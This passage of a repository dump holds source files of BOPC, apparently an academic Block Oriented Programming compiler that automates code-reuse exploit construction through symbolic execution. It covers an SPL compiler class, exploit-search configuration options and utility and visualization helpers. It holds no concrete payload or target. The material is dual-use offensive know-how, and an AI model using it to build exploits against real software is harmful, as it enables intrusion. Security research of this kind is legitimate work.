This is calculated as follows:\n        # It iterates over all statements and gets all registers in 'regset' (and 'memrd')\n        # statements (thanks to our semantic analysis, it's not allowed for a 'regmod' to use a\n        # register that hasn't been used in a previous 'regset'; thus we only care about\n        # 'regset'). Then it counts the distinct registers by transforming the list into a set.\n        self.nregs = len( set([s['reg'] for s in self if s['type'] in ['regset', 'memrd']]) )\n\n        # the number of distinct variables. The processing is identical to nregs\n        self.nvars = len( set([s['name'] for s in self if s['type'] == 'varset']) )\n\n        # the number of distinct variables whose references are assigned to registers\n        self.nregvars = len( set([s['val'][0] for s in self\n                                    if s['type'] == 'regset' and isinstance(s['val'], tuple)]) )\n\n        # the number of \"free\" variables. Free variables are not assigned to any register, so\n        # they can be placed at any memory address (due to the AWP)\n        self.nfreevars = self.nvars - self.nregvars\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor.\n    #\n    # :Arg filename: The SPL source file name\n    #\n    def __init__( self, filename ):\n        self.__prog = filename                      # program's file name is all we need\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # 
__getitem__(): Get i-th statement from IR. Out-of-order statements are grouped in the same\n    #       list entry, so we cannot find them in O(1) without some auxiliary data struct. For\n    #       now we simply do a linear search.\n    #\n    # :Arg idx: Index of the IR statement\n    # :Ret: The requested IR statement\n    # \n    def __getitem__( self, idx ):\n        assert( idx >= 0 )                          # bound checks\n\n        for _, stmt in self.__ir:                   # for each IR statement list\n            # each list has a single element here\n            if stmt[0]['uid'] == idx: return stmt   # if index found return statement\n\n        raise IndexError(\"No statement with uid = %d found\" % idx )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __len__(): Get the number of IR statements.\n    #\n    # :Ret: The number of IR statements.\n    #\n    def __len__( self ):\n        return len(self.__ir)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __iter__(): Iterate over all statements. This function is a generator over all statements\n    #       (no matter if they are out-of-order or not).\n    #\n    # :Ret: Each time, the generator yields the next statement.\n    #\n    def __iter__( self ):\n        for _, stmt_r in self.__ir:                 # for each IR statement list\n            for stmt in stmt_r:                     # for each \"parallel\" statement\n                yield stmt                          # return next statement\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # compile(): Compile the source file into its Intermediate Representation (IR). Make sure that\n    #       the file follows the syntax and the semantics of SPL.\n    #\n    # :Ret: None. 
If an error occurs, program will terminate.\n    #\n    def compile( self ):\n        dbg_prnt(DBG_LVL_1, \"Compiling '%s'...\" % self.__prog)\n        dbg_prnt(DBG_LVL_2, \"Parsing started.\")\n\n        tokens = []                                 # place all tokens here\n\n        try: \n            with open(self.__prog, \"r\") as file:    # open source file\n                # -----------------------------------------------------------------------\n                # Do the lexical analysis here\n                # -----------------------------------------------------------------------\n                for line in file:                   # process it line by line\n                    # drop all comments \"//\" from current line (be careful though to not\n                    # drop \"comments\" that are inside quotes)\n                    line = re.sub(\"(?!\\B\\\"[^\\\"]*)\\/\\/(?![^\\\"]*\\\"\\B).*\\n\", '', line)\n\n\n                    # tokenize line and append it to the token list\n                    lexical = shlex.shlex(line)     # create a lexical analysis object\n\n                    # TODO: this is not recognized as comment: //string s2 = \"/this\";\n\n                    #  lexical.commenters = '//'    # alternative way to drop comments\n                    lexical.wordchars += ''.join(set(''.join(asg_ops + cmp_ops) + '+-&'))\n\n                    symbols = [token for token in lexical]\n                    if symbols:                     # if there are any tokens\n\n                        # tokens are tuples (symbol, line number)\n                        tokens += zip(symbols, [self.__lineno]*len(symbols))\n\n                    self.__lineno = self.__lineno+1 # update line counter\n\n        except IOError:\n            fatal(\"File '%s' not found\" % self.__prog)\n\n\n\n        self.__do_syntax_parsing(tokens)            # do the syntax analysis\n\n        dbg_prnt(DBG_LVL_2, \"Parsing complete.\")\n\n        # ===-----\n        # At this point, 
program has a valid syntax. We move on to the semantic analysis\n        # ===-----\n\n        self.__fix_jump_targets()                   # fix goto branches (label => pc)\n        self.__do_semantic_checks()                 # do the semantic checks\n\n\n        # at this point each statement is of the form: [pc, stmt]. This form is not suitable for\n        # out of order statements, as we want them in the form: [pc, [stmt1, stmt2, ...]]. This is\n        # the job of the optimizer, but for now we have to prepare the IR accordingly, so we convert\n        # each statement into the form: [pc, [stmt]].\n        for s in self.__ir: s[1] = [s[1]]\n\n        self._calc_stats()                          # get IR statistics\n\n        dbg_prnt(DBG_LVL_1, \"Compilation completed.\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # get_ir(): Return the compiled IR.\n    #\n    # :Ret: The IR.\n    #\n    def get_ir( self ):\n        return self.__ir\n\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
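The lexical-analysis loop in `compile()` above strips `//` comments with a quote-aware regex and tokenizes each surviving line with `shlex`, pairing every token with its line number. A minimal standalone sketch of that loop (the SPL snippet is hypothetical, and the `wordchars` extension for SPL operators is omitted):

```python
import re
import shlex

# hypothetical SPL snippet; the real input comes from the .spl source file
source = 'string s = "/etc/passwd"; // trailing comment\nexecve(s);\n'

tokens = []                                     # (symbol, line number) tuples
for lineno, line in enumerate(source.splitlines(True), start=1):
    # drop "//" comments, but leave "//" sequences inside quotes intact
    line = re.sub(r'(?!\B"[^"]*)//(?![^"]*"\B).*\n', '', line)

    lexical = shlex.shlex(line)                 # lexical analysis object
    symbols = [token for token in lexical]      # tokenize what is left

    # pair each token with its line number, as compile() does
    tokens += zip(symbols, [lineno] * len(symbols))
```

Here the `// trailing comment` is removed before tokenization while the quoted path survives as a single token, so `tokens` begins with `('string', 1)` and the second line contributes tokens such as `('execve', 2)`.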
  {
    "path": "source/config.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# config.py\n#\n# This is the main configuration file with BOPC options.\n#\n# NOTE: There are a bunch of minor configuration options in coreutils.py, but there is no reason\n#       to modify them.\n#\n# -------------------------------------------------------------------------------------------------\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Depth metric for functions (can be 'min', 'max' or 'median')\n#  \n# Determine the metric for measuring a function's depth. This option estimates the minimum number of\n# distinct basic blocks that should be executed within a function. 
To do that, one should look at\n# the shortest paths from the entry point to all final basic blocks (those that end with a return\n# instruction) and select as depth the length of the minimum of these (shortest) paths ('min'\n# option).\n#\n# However, this metric might not always work that well, as it's very common to make argument checks\n# at the very early stages of a function and abort if they do not meet the requirements.\n#   \n# Hence, we provide 3 metrics: The minimum among the shortest paths that we discussed, the maximum\n# ('max' option) and the median of all shortest paths ('median' option).\n# \nFUNCTION_DEPTH_METRIC = 'min'\n\n\n\n# -------------------------------------------------------------------------------------------------\n# When the Symbolic Execution engine gives up on a basic block abstraction (in seconds)\n#\nABSBLK_TIMEOUT = 5\n\n\n\n# -------------------------------------------------------------------------------------------------\n# How many tries we should make before we give up on __enum_induced_subgraphs().\n#\n# Enumerating all induced subgraphs can take exponential time. To address that we set an upper\n# bound. After calculating a fixed number of induced subgraphs, we give up, and we use the \n# best ones up to that point. Set this value to -1 to set the upper bound to infinity.\n#\nMAX_INDUCED_SUBRAPHS_TRIES = -1\nMAX_ALLOWED_INDUCED_SUBGRAPHS = 1024\n\n\n\n# -------------------------------------------------------------------------------------------------\n# How many times we should permute the OOO SPL statements before we give up. Set to -1 to try all\n# possible permutations. This makes sense when the 'ooo' optimization is enabled\n#\nN_OUT_OF_ORDER_ATTEMPTS = 3\n\n\n\n# -------------------------------------------------------------------------------------------------\n# The trace searching algorithm picks the K shortest paths from the Delta Graph (K = PARAMETER_K).\n# However, there are cases where there are more than K paths that are all worth trying. 
In those cases we keep trying\n# paths, as long as their distances are below this threshold.\n#\n# MAX_GOOD_INDUCED_SUBGRAPH_SIZE = 10 (NOT IMPLEMENTED)\n#\nPARAMETER_K = 4  # 10\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Number of different shortest paths between 2 functional blocks (needed for concolic execution).\n# Set to -1 to try all shortest paths\n#\nPARAMETER_P = 8\n\n\n\n# -------------------------------------------------------------------------------------------------\n# The actual size of load/store operations for memrd and memwr SPL statements in bytes. This\n# parameter can be 1, 2, 4 or 8 bytes.\n#\nMEMORY_LOADSTORE_SIZE = 1\n\n\n\n# -------------------------------------------------------------------------------------------------\n# When the Symbolic Execution engine gives up on trace searching (in seconds). That is, when\n# the concolic execution gives up on verifying a dispatcher gadget.\n#\nSE_TRACE_TIMEOUT = 8\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Maximum length of the final trace (a candidate execution trace cannot have more blocks than this).\n#\nMAX_ALLOWED_TRACE_SIZE = 100\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Maximum number of basic blocks in a path between 2 accepted blocks (i.e., maximum number of basic\n# blocks in a dispatcher).\n#\nMAX_ALLOWED_SUBPATH_LEN = 40\n\n\n\n# -------------------------------------------------------------------------------------------------\n# The stack base address (along with $rsp) for symbolic execution.\n#\n# WARNING: Make sure that RSP doesn't go beyond the page limit (o/w addresses are not +w); +0x800 is\n#          a very good offset. 
Don't change it!\n# \nSTACK_BASE_ADDR = 0x7ffffffffff0000\nRSP_BASE_ADDR   = STACK_BASE_ADDR + 0x800\n\n\n\n# -------------------------------------------------------------------------------------------------\n# In some cases it may be worth making $rbp symbolic as well (depends on the binary).\n#\nMAKE_RBP_SYMBOLIC = False\n\n\n\n# -------------------------------------------------------------------------------------------------\n# What if the final solution requires some registers to be initialized at the entry point? In that\n# case we can either shift the entry point backwards, to the point where that register is\n# initialized, and re-run BOPC from there, or we can simply discard such solutions.\n#\nALLOW_REGISTER_WRITES = True\n\n\n\n# -------------------------------------------------------------------------------------------------\n# I have no idea what this is for, but it seems that I was planning to make another optimization.\n#\nMAXIMUM_THRESHOLD = 0x800\n\n\n\n# -------------------------------------------------------------------------------------------------\n# When we deal with loops, the Symbolic Execution engine should simulate the loop the same number\n# of times (to ensure that all iterations can be executed successfully under exploitation).\n# However, when we have infinite loops, we cannot simulate the loop an infinite number of times,\n# but instead we have to stop at a certain threshold.\n#\n# WARNING: Make sure that in case of conditional loops, the number of expected iterations is\n#          larger than this value, otherwise we will get no solution\n#\nSIMULATED_LOOP_ITERATIONS = 4  # 128\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Another optimization that was never implemented...\n#\nADAPTIVE_LOOP_SIMULATION = True\n\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
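The `FUNCTION_DEPTH_METRIC` option above chooses among three statistics over the shortest paths from a function's entry block to its return blocks. A minimal sketch of that computation on a hypothetical adjacency-list CFG (plain BFS instead of BOPC's angr-based CFG, so the names and graph here are illustrative only):

```python
from collections import deque
import statistics

def shortest_path_len(adj, src, dst):
    """BFS shortest-path length (in edges) in an adjacency-list graph."""
    seen, queue = {src}, deque([(src, 0)])
    while queue:
        node, dist = queue.popleft()
        if node == dst:
            return dist
        for succ in adj.get(node, []):
            if succ not in seen:
                seen.add(succ)
                queue.append((succ, dist + 1))
    return None                                 # dst unreachable from src

def function_depth(adj, entry, return_blocks, metric='min'):
    """Depth of a function under the 'min', 'max' or 'median' metric."""
    lengths = [d for d in (shortest_path_len(adj, entry, r)
                           for r in return_blocks) if d is not None]
    if not lengths:
        return 0
    if metric == 'min':                         # optimistic: earliest return
        return min(lengths)
    if metric == 'max':                         # pessimistic: deepest return
        return max(lengths)
    return statistics.median(lengths)           # robust to early-abort paths

# toy CFG: early abort path A -> D, normal path A -> B -> C -> E
cfg = {'A': ['B', 'D'], 'B': ['C'], 'C': ['E']}
```

With this toy CFG, `'min'` returns 1 (the early abort at `D` dominates), while `'max'` returns 3 and `'median'` returns 2, which is exactly why the comment above warns that `'min'` can underestimate functions that abort early on failed argument checks.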
  {
    "path": "source/coreutils.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# coreutils.py:\n#\n# This module contains basic declarations and functions that are being used by all other modules.\n#\n# -------------------------------------------------------------------------------------------------\nfrom config import *                                # load configuration options\n\nfrom graphviz import Digraph\nimport networkx as nx\nimport datetime\nimport random\nimport re\nimport angr\nimport textwrap\n\n\n\n\n# -------------------------------------------------------------------------------------------------\n\n''' =========================================================================================== '''\n'''                                    CONSTANT DECLARATIONS                                    '''\n''' =========================================================================================== '''\n\n# 
-------------------------------------------------------------------------------------------------\nRETURN_SUCCESS     = 0                              # return code for success\nRETURN_FAILURE     = -1                             # return code for failure\n\nDBG_LVL_0          = 0                              # debug level 0: Display no information\nDBG_LVL_1          = 1                              # debug level 1: Display minimum information\nDBG_LVL_2          = 2                              # debug level 2: Display basic information\nDBG_LVL_3          = 3                              # debug level 3: Display detailed information\nDBG_LVL_4          = 4                              # debug level 4: Display all information\n\nINFINITY           = 9999999                        # value of infinity\n\nSTART_PC           = 0                              # PC of the 1st statement\n\nADDR2NODE          = { }                            # map addresses to basic block nodes\nADDR2FUNC          = { }                            # map basic block addresses to their functions\nSTR2BV             = { }                            # map strings to bitvectors\n\n\n# WARNING: be very careful how to set rbp\nFRAMEPTR_BASE_ADDR = RSP_BASE_ADDR + 0xc00          # base address of rbp (when it's used)\n\nHARDWARE_REGISTERS = [                              # x64 hardware registers\n    'rax', 'rdx', 'rcx', 'rbx', 'rdi', 'rsi', 'rsp', 'rbp',\n    'r8',  'r9',  'r10', 'r11', 'r12', 'r13', 'r14', 'r15' \n]\n\nSYM2ADDR = { }\n\nSYMBOLIC_FILENAME = 'foo.txt'                       # filename for the symbolic execution to use\n\n\n\n# -------------------------------------------------------------------------------------------------\n\n''' =========================================================================================== '''\n'''                                     AUXILIARY FUNCTIONS                                     '''\n''' 
=========================================================================================== '''\n\n# -------------------------------------------------------------------------------------------------\ndbg_lvl = DBG_LVL_0                                 # initially, debug level is set to 0\n\n\n# -------------------------------------------------------------------------------------------------\n# set_dbg_lvl(): Set the current debug level. This is a small trick to share a variable between\n#   modules. We set the debug level once during startup, so we don't have to carry it around the\n#   modules.\n# \n# :Arg lvl: Desired debug level.\n# :Ret: None.\n#\ndef set_dbg_lvl( lvl ):\n    global dbg_lvl                                  # use the global var     \n    if lvl: dbg_lvl = lvl                           # set it accordingly (if lvl is proper)\n\n\n\n# ---------------------------------------------------------------------------------------------\n# to_uid(): Cast a program counter (PC) to a unique ID (UID).\n#\n# :Arg pc: The program counter\n# :Ret: The uid.\n#\ndef to_uid( pc ):\n    if not re.match(r'^@__[0-9]+$', pc):            # verify pc\n        raise Exception(\"Invalid Program counter '%s'.\" % pc)\n\n    return int(pc[3:])                              # simply drop the first 3 characters\n\n\n\n# ---------------------------------------------------------------------------------------------\n# pretty_list(): Cast a list into a pretty string, for displaying to the user. 
This can\n#       also be done using join(), but the code starts getting ugly when we have to cast each element.\n#\n# :Arg uglylist: The list to work on\n# :Ret: A string containing a pretty \"join\" of the list.\n#\ndef pretty_list( uglylist, delimiter=' - '):\n    pretty = ''                                     # the final string\n\n    for elt in uglylist:\n        if isinstance(elt, int) or isinstance(elt, long):\n            pretty += delimiter + '%x' % elt\n\n        elif isinstance(elt, str):\n            pretty += delimiter + elt\n\n        elif isinstance(elt, angr.analyses.cfg.cfg_node.CFGNode):\n            pretty += delimiter + '%x' % elt.addr\n\n        else:\n            fatal(\"Unsupported list element type '%s'\" % str(type(elt)))\n\n\n    # drop the first delimiter (if it exists) and return the string\n    return pretty[len(delimiter):] if pretty else ''\n\n\n\n# -------------------------------------------------------------------------------------------------\n# to_edges(): Convert a path to edges. That is, given the path P = ['A', 'B', 'C', 'D', 'E'],\n#       return its edges: [('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'E')]. Function is a \n#       generator, so it returns one edge at a time.\n#\n#       Note that function can be implemented with a single line: \"return zip(path, path[1:])\".\n#       However, the problem with zip() is that it creates 2 more copies of the list, which is\n#       not very efficient when paths are long and all we want is to iterate over the edges.\n#\n# :Arg path: A list that contains a path\n# :Arg direction: Edge direction (forward/backward)\n# :Ret: Function is a generator. 
Each time the next edge from the path is returned.\n#\ndef to_edges( path, direction='forward' ):\n    if len(path) < 2: return                        # nothing to do\n\n    u = path[0]                                     # get the 1st node\n    for v in path[1:]:\n        if   direction == 'forward':  yield (u, v)  # return the previous and the current node\n        elif direction == 'backward': yield (v, u)  # or return the backward edge\n\n        u = v                                       # update previous node\n\n\n\n# -------------------------------------------------------------------------------------------------\n# mk_reverse_adj(): Given an Adjacency List, make the Reverse Adjacency List.\n#\n# :Arg adj: The Adjacency List\n# :Ret: Function returns a dictionary which encodes the Reverse Adjacency List.\n#\ndef mk_reverse_adj( adj ):\n    radj = { }\n\n    for a, b in adj.iteritems():\n        for c in b:\n            radj.setdefault(c, []).append(a)\n\n    return radj\n\n\n\n# -------------------------------------------------------------------------------------------------\n# disjoint(): Check whether two sets are disjoint or not.\n#\n# :Arg set_a: The first set\n# :Arg set_b: The second set\n# :Ret: If sets are disjoint, function returns True. 
Otherwise it returns False.\n#\ndef disjoint( set_a, set_b ):\n    for a in set_a:\n        for b in set_b:\n            if a == b: \n                return False\n\n    return True\n\n\n\n# -------------------------------------------------------------------------------------------------\n# log(): Log execution statistics to a file.\n#\n# :Arg msg: Message to log\n# :Ret: None.\n#\ndef log( msg ):\n    pass                                            # not used.\n\n\n\n# -------------------------------------------------------------------------------------------------\n\n''' =========================================================================================== '''\n'''                                     PRINTING FUNCTIONS                                      '''\n''' =========================================================================================== '''\n\n# -------------------------------------------------------------------------------------------------\n# now(): Get current time. 
Time is prepended to every print statement.\n#\n# :Ret: A string containing the current time.\n#\ndef now():\n    return '[%s]' % datetime.datetime.now().strftime(\"%H:%M:%S,%f\")[:-3]\n\n\n\n# -------------------------------------------------------------------------------------------------\n# dbg_prnt(): Display a debug message to the user.\n#\n# :Arg lvl: Message's debug level\n# :Arg msg: Message to print\n# :Arg pre: Message prefix (OPTIONAL)\n# :Ret: None.\n#\ndef dbg_prnt( lvl, msg, pre='[+] ' ):\n    if dbg_lvl >= lvl:                              # print only if you're in the right level\n        print now(), pre + msg\n\n\n\n# -------------------------------------------------------------------------------------------------\n# dbg_arb(): Display a debug message followed by an arbitrary data structure to the user.\n#\n# :Arg lvl: Message's debug level\n# :Arg msg: Message to print\n# :Arg arb: The arbitrary data struct (e.g., list, dict) to print\n# :Arg pre: Message prefix (OPTIONAL)\n# :Ret: None.\n#\ndef dbg_arb( lvl, msg, arb, pre='[+] ' ):\n    if dbg_lvl >= lvl:                              # print only if you're in the right level\n        print now(), pre + msg, arb\n    \n\n\n# -------------------------------------------------------------------------------------------------\n# func_name(): Convert an address to the name of its function, or\n# \"__unknown\" if it cannot be found.\n#\n# :Arg addr: The address to lookup\n# :Ret: Returns a string with the name of the function containing the address, or \"__unknown\".\n#\ndef func_name ( addr ):\n    if addr in ADDR2FUNC:\n        return ADDR2FUNC[addr].name\n    else:\n        return \"__unknown\"\n\n\n\n# -------------------------------------------------------------------------------------------------\n# fatal(): This function is invoked when a fatal error occurs. 
It prints the error and terminates\n#       the program.\n#\n# :Arg err: Error message to print\n# :Ret: None.\n#\ndef fatal( err ):\n    print '\\033[91m%s [FATAL]' % now(), err + '.\\033[0m'\n    exit( RETURN_FAILURE )\n\n\n\n# -------------------------------------------------------------------------------------------------\n# error(): This function is invoked when a non-fatal error occurs. It prints the error without\n#       terminating the program.\n#\n# :Arg err: Error message to print\n# :Ret: None.\n#\ndef error( err ):\n    print '\\033[91m%s [ERROR]' % now(), err + '.\\033[0m'\n    \n\n\n# -------------------------------------------------------------------------------------------------\n# warn(): Print a warning.\n#\n# :Arg warn: Warning to print\n# :Arg lvl: Warning's debug level (OPTIONAL)\n# :Ret: None.\n#\ndef warn( warn, lvl=DBG_LVL_0 ):\n    if dbg_lvl >= lvl:                              # print only if you're in the right level\n        print  '\\033[93m%s [WARNING]' % now(),  warn + '.\\033[0m'\n    \n\n\n# -------------------------------------------------------------------------------------------------\n# emph(): Print an emphasized message.\n#\n# :Arg msg: Message to print\n# :Arg lvl: Message's debug level\n# :Arg pre: Message prefix (OPTIONAL)\n# :Ret: None.\n#\ndef emph( msg, lvl=DBG_LVL_0 , pre='[*] '):\n    # default mode is to print always\n    if dbg_lvl >= lvl:                              # print only if you're in the right level\n        print  '\\033[0;32m%s' % now(), pre + msg + '\\033[0m'\n\n\n\n# -------------------------------------------------------------------------------------------------\n# bold(): Emphasize a number (bold).\n#\n# :Arg num: Number to make bold\n# :Arg ty: The type of the number (int / float)\n# :Arg pad: Zero padding size (OPTIONAL)\n# :Ret: The emphasized number.\n#\ndef bold( num, ty='int', pad=None ):\n    fms = 'd' if ty == 'int' else '.2f'           # select the format string (int / float)\n\n    if not pad:\n        return 
(\"\\033[1m%\" + fms + \"\\033[21m\") % num\n    else:\n        # this is a double format string (recursive)        \n        return (\"\\033[1m\" + ((\"%%%d\" + fms) % pad) + \"\\033[21m\") % num \n\n\n\n# -------------------------------------------------------------------------------------------------\n# bolds(): Emphasize a string (bold).\n#\n# :Arg string: Message to make bold\n# :Ret: The emphasized string.\n#\ndef bolds( string ):\n    return \"\\033[1m%s\\033[21m\" % string             # print in bold (and unbold)\n\n\n\n# -------------------------------------------------------------------------------------------------\n# rainbow(): Colorize a string with rainbow colors.\n#\n# :Arg string: Message to make rainbow.\n# :Ret: The colorized string.\n#\ndef rainbow( string ):\n    RED     = lambda key : \"\\033[91m%c\\033[0m\" % key\n    GREEN   = lambda key : \"\\033[92m%c\\033[0m\" % key\n    YELLOW  = lambda key : \"\\033[93m%c\\033[0m\" % key\n    MAGENTA = lambda key : \"\\033[95m%c\\033[0m\" % key\n    CYAN    = lambda key : \"\\033[96m%c\\033[0m\" % key\n   \n    return ''.join([{ 0 : RED, \n                      1 : CYAN, \n                      2 : YELLOW, \n                      3 : MAGENTA, \n                      4 : GREEN \n                    }[ ctr % 5 ](ch) for ctr, ch in enumerate(string)])\n\n\n\n# -------------------------------------------------------------------------------------------------\n\n''' =========================================================================================== '''\n'''                                GRAPH VISUALIZATION FUNCTIONS                                '''\n''' =========================================================================================== '''\n\n# -------------------------------------------------------------------------------------------------\n# Visualizing Options (VO)\n# -------------------------------------------------------------------------------------------------\nVO_NONE            = 0x0000                
         # no visualization\nVO_TYPE_CFG        = 'cfg'                          # visualization mode: CFG\nVO_TYPE_DELTA      = 'delta'                        # visualization mode: delta graph\nVO_TYPE_CAPABILITY = 'cap'                          # visualization mode: capability graph\nVO_CFG             = 0x0080                         # visualize CFG\nVO_CAND            = 0x0040                         # visualize candidate blocks\nVO_ACC             = 0x0010                         # visualize accepted blocks\nVO_CLOB            = 0x0020                         # visualize clobbering blocks\nVO_PATHS           = 0x1000                         # draw execution paths (i.e., dispatchers)\nVO_DRAW_INF_EDGES  = 0x2000                         # draw edges with infinite weight\n\n\n\n# -------------------------------------------------------------------------------------------------\n# _node_colors: A helper class that maps graph nodes to their display colors. It supports bulk\n#       assignment (a color to a set of nodes), iteration over (node, color) pairs, and\n#       membership tests.\n#\nclass _node_colors( object ):\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Start with an empty color map.\n    #\n    def __init__( self ):\n        self.__colormap = dict()\n\n    # ---------------------------------------------------------------------------------------------\n    # __setitem__(): Assign a color to every node in a node set.\n    #\n    def __setitem__( self, color, nodeset ):\n        for node in nodeset:\n            self.__colormap[ node ] = color\n\n    # ---------------------------------------------------------------------------------------------\n    # __iter__(): Iterate over all (node, color) pairs.\n    #\n    def __iter__( self ):\n        for node, color in self.__colormap.iteritems():\n            yield (node, color)\n\n    # ---------------------------------------------------------------------------------------------\n    # __contains__(): Check whether a node has been assigned a color.\n    #\n    def __contains__( self, node ):\n        return node in self.__colormap\n\n    # ---------------------------------------------------------------------------------------------\n    # get_nodes(): Return all nodes that have a color.\n    #\n    def get_nodes( self ):\n        return self.__colormap.keys()\n\n\n# -------------------------------------------------------------------------------------------------\n\n\n\n# -------------------------------------------------------------------------------------------------\n# __get_dg_layers(): Get delta graph layers.\n# \n# :Arg delta_graph: The delta graph\n# :Ret: The list of layers.\n#\ndef __get_dg_layers( delta_graph ):\n    return sorted( list(set([uid for uid,_ in delta_graph.nodes()])) )\n    \n\n \n# -------------------------------------------------------------------------------------------------\n# __get_dg_layer_nodes(): Get the nodes from a delta graph layer.\n#\n# :Arg delta_graph: The delta graph\n# :Arg layer_id: Layer to return\n# :Ret: The list of nodes for the specified layer.\n#\ndef __get_dg_layer_nodes( delta_graph, layer_id ):\n    return sorted([addr for uid, addr in 
delta_graph.nodes() if uid == layer_id])\n      \n\n\n# -------------------------------------------------------------------------------------------------\n# visualize(): Visualize a graph and save it into an (svg) file. This function supports a\n#       number of options to customise the visualization.\n#\n# :Arg filename: The name of the generated file.\n# :Arg entry: The entry point where the trace searching algorithm starts\n# :Arg options: An integer that describes how the CFG should be visualized. It can be the \n#       logical OR of one or more of the following:\n#\n#       VO_NONE            | Do not draw anything (Default)\n#       VO_CFG             | Draw the CFG\n#       VO_CAND            | Draw all candidate blocks\n#       VO_ACC             | Draw all accepted blocks\n#       VO_CLOB            | Draw all clobbering blocks\n#       VO_PATHS           | Draw the execution paths, i.e., dispatchers (if any)\n#       VO_DRAW_INF_EDGES  | Draw the edges with infinite weight\n#\n# :Arg paths: If VO_PATHS is set, this argument is a list of the paths to draw\n# :Ret: If the CFG is visualized successfully function returns True. 
Otherwise it returns\n#       False.\n#\ndef visualize( graph, gtype='', options=VO_NONE, entry=-1, filename=None, paths=set(), cur_uid=0, \n               func=None ):\n                   \n    G = Digraph('G', format='svg', filename=filename)\n\n    nodes      = _node_colors()\n    nodeset    = set()\n    path_edges = { }\n    path_nodes = set()\n\n    '''\n    if options & VO_DRAW_SE_PATHS:              # show \n        edges = []\n\n        # convert paths (a, b, c, d) to edge sets ((a,b), (b,c), (c,d))\n        for path in paths:\n            u = path[0]\n            \n            for v in path[1:]:\n                edges.append( (u, v) )\n                u = v\n\n\n        # draw all edges \n        nx.draw_networkx_edges(G, pos, edgelist=edges,\n             edge_color='red', style='solid', arrows=False, width=1, alpha=1)\n    '''\n\n    if options & VO_PATHS:\n        #   for path in paths:\n        #       for u in path:\n        #           path_nodes.add(u)\n        #\n        #   for u, v in zip(path, path[1:]):\n        #        path_edges[ (u, v) ] = 1\n\n        path_edges = paths\n\n\n    # ---------------------------------------------------------------------\n    # Control Flow Graph\n    # ---------------------------------------------------------------------\n    if gtype == VO_TYPE_CFG:\n        # -------------------------------------------------------------------------------\n        # First identify the set of nodes (along with the color) to visualize\n        # -------------------------------------------------------------------------------\n\n        # -------------------------------------------------------------------------------\n        if options & VO_CFG:\n            for node in graph.nodes():\n                if func and node.addr not in func.block_addrs:\n                    continue\n\n                G.node('%x' % node.addr, fillcolor='white', shape='box', style='filled')\n                nodeset.add(node.addr)\n\n        # 
